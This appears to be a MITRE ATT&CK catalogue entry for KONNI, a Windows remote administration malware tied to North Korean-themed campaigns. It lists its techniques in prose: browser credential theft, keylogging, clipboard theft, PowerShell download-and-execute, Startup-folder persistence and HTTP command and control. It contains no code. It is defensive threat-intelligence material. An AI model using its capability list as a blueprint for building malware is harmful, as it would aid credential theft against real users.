Register to stream ATT&CKcon 2.0 October 29-30


KONNI is a Windows remote administration too that has been seen in use since 2014 and evolved in its capabilities through at least 2017. KONNI has been linked to several campaigns involving North Korean themes.[1] KONNI has significant code overlap with the NOKKI malware family. There is some evidence potentially linking KONNI to APT37.[2][3]

ID: S0356
Platforms: Windows
Version: 1.1

Techniques Used

Domain ID Name Use
Enterprise T1115 Clipboard Data KONNI had a feature to steal data from the clipboard. [1]
Enterprise T1059 Command-Line Interface KONNI can execute arbitrary commands on the infected host using cmd.exe. [1]
Enterprise T1003 Credential Dumping KONNI can steal profiles (containing credential information) from Firefox, Chrome, and Opera. [1]
Enterprise T1083 File and Directory Discovery A version of KONNI searches for filenames created with a previous version of the malware, suggesting different versions targeted the same victims and the versions may work together. [1]
Enterprise T1107 File Deletion KONNI can delete files. [1]
Enterprise T1056 Input Capture KONNI has the capability to perform keylogging. [1]
Enterprise T1036 Masquerading KONNI creates a shortcut called "Anti virus service.lnk" in an apparent attempt to masquerade as a legitimate file. [1]
Enterprise T1086 PowerShell KONNI used PowerShell to download and execute a specific 64-bit version of the malware. [1]
Enterprise T1060 Registry Run Keys / Startup Folder A version of KONNI drops a Windows shortcut into the Startup folder to establish persistence. [1]
Enterprise T1105 Remote File Copy KONNI can download files and execute them on the victim’s machine. [1]
Enterprise T1113 Screen Capture KONNI can take screenshots of the victim’s machine. [1]
Enterprise T1023 Shortcut Modification A version of KONNI drops a Windows shortcut on the victim’s machine to establish persistence. [1]
Enterprise T1071 Standard Application Layer Protocol KONNI has used HTTP for C2. [1]
Enterprise T1082 System Information Discovery KONNI can gather the OS version, architecture information, connected drives, hostname, and computer name from the victim’s machine. [1]
Enterprise T1016 System Network Configuration Discovery KONNI can collect the IP address from the victim’s machine. [1]
Enterprise T1033 System Owner/User Discovery KONNI can collect the username from the victim’s machine. [1]